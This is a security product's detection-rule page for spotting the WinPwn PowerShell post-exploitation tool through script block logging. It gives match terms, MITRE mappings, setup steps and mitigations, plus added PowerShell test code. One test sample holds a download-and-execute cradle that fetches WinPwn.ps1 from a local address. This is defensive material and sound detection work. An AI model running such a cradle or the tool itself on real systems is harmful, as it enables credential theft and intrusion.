HackTool - WinPwn Execution - ScriptBlock

Rule name

HackTool - WinPwn Execution - ScriptBlock

Rule type

Standard

Log sources

Windows

MITRE ATT&CK tags

Defense Evasion: Abuse Elevation Control Mechanism - Bypass User Account Control (T1548.002); Privilege Escalation: Abuse Elevation Control Mechanism - Bypass User Account Control (T1548.002); Execution: Native API (T1106); Credential Access: Unsecured Credentials - Credentials In Files (T1552.001); Discovery: System Information Discovery (T1082); Discovery: Software Discovery (T1518); Discovery: Network Service Discovery (T1046); Credential Access: Credentials from Password Stores - Credentials from Web Browsers (T1555.003); Credential Access: Credentials from Password Stores (T1555)

Severity

Trouble

About the rule

Rule Type

Standard

Rule Description

WinPwn is a PowerShell-based post-exploitation and reconnaissance framework that automates Active Directory enumeration, credential harvesting, and privilege escalation checks. This rule detects PowerShell script block content that indicates WinPwn being loaded or invoked for AD reconnaissance and discovery.

Severity

Trouble

Rule journey

Attack chain scenario

Initial Access → PowerShell execution → Discovery → Credential Access

Impact

  • System compromise
  • Credential compromise
  • Data theft

Rule Requirement

Prerequisites

Log on to the Group Policy Management Console with administrative privileges and, in the Group Policy Management Editor, enable Module Logging for Windows PowerShell, entering * in the Module Names window so that all modules are recorded. Enable PowerShell Script Block Logging for Windows PowerShell in the same way. Finally, create a new registry key named "Microsoft-Windows-PowerShell/Operational" under "Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\".
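The following is an added example, not part of the original page or the product's own code. It writes the registry values that the two Group Policy settings above populate (the standard policy paths under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell) and then confirms that Event ID 4104 records are actually being produced, which is the event this rule consumes. Run it from an elevated PowerShell prompt on the host being configured; in a domain, the GPO route above is preferable because the setting is then enforced centrally. The marker string used for verification is an assumption of this example.

```powershell
# Added example: enable PowerShell Module Logging and Script Block Logging via
# the policy registry values, then verify 4104 events appear. Requires an
# elevated prompt. Not the original page's code.

$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Script Block Logging -> Event ID 4104 in Microsoft-Windows-PowerShell/Operational
$sbl = Join-Path $base 'ScriptBlockLogging'
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

# Module Logging -> Event ID 4103; the '*' entry under ModuleNames records every module
$ml = Join-Path $base 'ModuleLogging'
New-Item -Path $ml -Force | Out-Null
Set-ItemProperty -Path $ml -Name 'EnableModuleLogging' -Value 1 -Type DWord
$names = Join-Path $ml 'ModuleNames'
New-Item -Path $names -Force | Out-Null
Set-ItemProperty -Path $names -Name '*' -Value '*' -Type String

# Verify: the policy is read when a PowerShell process starts, so execute a
# marker script block in a child process and look for its 4104 record.
$marker = "SBL-CHECK-$(Get-Random)"   # assumed marker, chosen for this example
powershell.exe -NoProfile -Command "Write-Output '$marker'" | Out-Null
Start-Sleep -Seconds 2

$hit = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'
    Id      = 4104
} -MaxEvents 200 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -like "*$marker*" }

if ($hit) {
    "Script block logging is active (marker recorded at $($hit[0].TimeCreated))."
} else {
    'No 4104 event found: check the policy values above and that the Operational log is enabled.'
}
```

The verification step matters more than it looks: the rule below is only as good as the 4104 feed behind it, and a host where the policy was set but the Operational channel is disabled or size-limited will never produce the "PowerShell Script Block Logged" action the criteria depend on.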

(((( SCRIPTEXECUTED CONTAINS "offline_winpwn" ) OR ( SCRIPTEXECUTED CONTAINS "winpwn" ) OR ( SCRIPTEXECUTED CONTAINS "winpwn.exe" ) OR ( SCRIPTEXECUTED CONTAINS "winpwn.ps1" ) )))

This rule is triggered when the executed script block contains any of the following strings. The comparison is a substring match, so the term "winpwn" by itself already covers the other three; they are listed separately for readability, and the match should be evaluated case-insensitively so that variations such as WinPwn or WINPWN are not missed.

  • offline_winpwn: Refers to Offline_WinPwn, the variant of WinPwn packaged to run without fetching its components, used for Windows privilege escalation and post-exploitation.
  • winpwn: Refers to the WinPwn tool itself, which is used for post-exploitation reconnaissance and credential access.
  • winpwn.exe: Refers to a compiled WinPwn executable.
  • winpwn.ps1: Refers to the PowerShell script that loads the WinPwn tool.

Criteria

Action1: actionname = "PowerShell Script Block Logged" AND SCRIPTEXECUTED contains "Offline_Winpwn,WinPwn,WinPwn.exe,WinPwn.ps1" select Action1.HOSTNAME,Action1.MESSAGE,Action1.SCRIPTEXECUTED
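As an added example (not the page's or the product's code), the block below applies the rule's four match terms to PowerShell 4104 ScriptBlockText values so the logic can be checked before it is deployed. The sample records are constructed for this example, including the hostnames and the 10.0.0.5 download address; the commented line at the end shows how to point the same function at a live host's Operational log.

```powershell
# Added example: emulate the rule's substring match over constructed
# ScriptBlockText samples. Not the original page's code.

$terms = @('offline_winpwn', 'winpwn', 'winpwn.exe', 'winpwn.ps1')

# Constructed samples: two genuine WinPwn invocations, one benign AD query,
# and one that only mentions the name (a false positive the rule will raise).
$samples = @(
    [pscustomobject]@{ Host = 'WKS-01'; ScriptBlockText = 'IEX (New-Object Net.WebClient).DownloadString("http://10.0.0.5/WinPwn.ps1"); WinPwn -noninteractive -consoleoutput' }
    [pscustomobject]@{ Host = 'SRV-02'; ScriptBlockText = 'Import-Module .\Offline_WinPwn.ps1; Offline_WinPwn -noninteractive' }
    [pscustomobject]@{ Host = 'WKS-03'; ScriptBlockText = 'Get-ADUser -Filter * -Properties LastLogonDate | Export-Csv users.csv' }
    [pscustomobject]@{ Host = 'WKS-04'; ScriptBlockText = '# ticket 4711: decide whether to add WINPWN to the blocklist' }
)

function Test-WinPwnScriptBlock {
    param([string]$Text)
    # -like is case-insensitive by default, which is the behaviour the rule needs:
    # an attacker controls the capitalisation of the tool name, not the defender.
    foreach ($t in $terms) {
        if ($Text -like "*$t*") { return $t }
    }
    return $null
}

$alerts = 0
foreach ($s in $samples) {
    $m = Test-WinPwnScriptBlock $s.ScriptBlockText
    if ($m) { $alerts++; 'ALERT  {0}: matched "{1}"' -f $s.Host, $m }
    else    { 'ok     {0}' -f $s.Host }
}

# The other three terms add no coverage: every block that fires also matches
# the bare "winpwn" substring, so this count equals $alerts.
$bareCount = @($samples | Where-Object { $_.ScriptBlockText -like '*winpwn*' }).Count
"{0} alerts from the full term list, {1} from 'winpwn' alone." -f $alerts, $bareCount

# Live host (uncomment): Properties[2] of a 4104 event is ScriptBlockText.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     Where-Object { Test-WinPwnScriptBlock $_.Properties[2].Value } |
#     Select-Object MachineName, TimeCreated, @{ n = 'Term'; e = { Test-WinPwnScriptBlock $_.Properties[2].Value } }
```

Three of the four constructed samples fire, including WKS-04, which only mentions the tool in a comment. That is inherent to a substring rule and is why triage should start from the surrounding script block content (SCRIPTEXECUTED and MESSAGE are selected for exactly that reason) rather than from the match term alone.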

Detection

Execution Mode

realtime

Log Sources

Active Directory

MITRE ATT&CK

Defense Evasion: Abuse Elevation Control Mechanism - Bypass User Account Control (T1548.002); Privilege Escalation: Abuse Elevation Control Mechanism - Bypass User Account Control (T1548.002); Execution: Native API (T1106); Credential Access: Unsecured Credentials - Credentials In Files (T1552.001); Discovery: System Information Discovery (T1082); Discovery: Software Discovery (T1518); Discovery: Network Service Discovery (T1046); Credential Access: Credentials from Password Stores - Credentials from Web Browsers (T1555.003); Credential Access: Credentials from Password Stores (T1555)

Security Standards

Enabling this rule will help you meet the security standard requirement listed below:

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events.

When this rule is triggered, you're notified of a PowerShell script execution involving the WinPwn hack tool. This enables you to monitor runtime environments like PowerShell to identify malicious executions that provide unauthorized access to AD credentials and configurations.

Author

Swachchhanda Shrawan Poudel

Future actions

Known False Positives

This rule might be triggered when red teams carry out authorized penetration tests to identify AD vulnerabilities and misconfigurations. Because the criteria are a plain substring match, it will also fire on any script block that merely contains the tool name, such as security tooling, blocklist maintenance, or documentation that references WinPwn without executing it.

Next Steps

When this rule is triggered, the following measures can be implemented:

  1. Identification: Identify if the flagged event is a new incident or part of an existing incident.
  2. Analysis: Analyze the impact and extent of the incident to comprehend the severity of the attack using the Incident Workbench.
  3. Response: Respond promptly by initiating an automated workflow to interrupt the network connections and cease the malicious process.
  4. Audit PowerShell executions: Continuously monitor PowerShell activities, block command executions that involve hack tools like WinPwn, and restrict script execution privileges to administrators only.

Mitigation

Mitigation ID

Mitigation Name

Mitigation description

M1042

Disable or Remove Feature or Program

Block open ports and services to prevent malicious attempts of discovery.

M1031

Network Intrusion Prevention

Implement network IDS/IPS to monitor attempts to scan the network remotely.

M1030

Network Segmentation

Employ network segmentation to protect and isolate critical systems.

M1047

Audit

Continuously monitor systems to detect UAC bypass attempts.

M1026

Privileged Account Management

Limit local administrator group membership to privileged users.

M1051

Update Software

Regularly update Windows devices and implement patch updates to prevent UAC bypass attacks.

M1052

User Account Control

Employ the highest enforcement level for UAC to defend against bypass techniques.

M1040

Behavior Prevention on Endpoint

Enable Attack Surface Reduction (ASR) rules on Windows 10 devices.

M1038

Execution Prevention

Employ application control to prevent the execution of malicious software.

M1027

Password Policies

Enforce password policies that prevent the storage of passwords in local files.

M1022

Restrict File and Directory Permissions

Restrict access to file shares to necessary users.

M1017

User Training

Train system administrators on the risks of storing plaintext passwords in configuration files.

M1021

Restrict Web-Based Content

Configure browser settings to block third-party cookies and protect saved credentials from unauthorized access.

M1018

User Account Management

Implement security policies that enforce user access control to sensitive data and audit user activity to identify account compromises.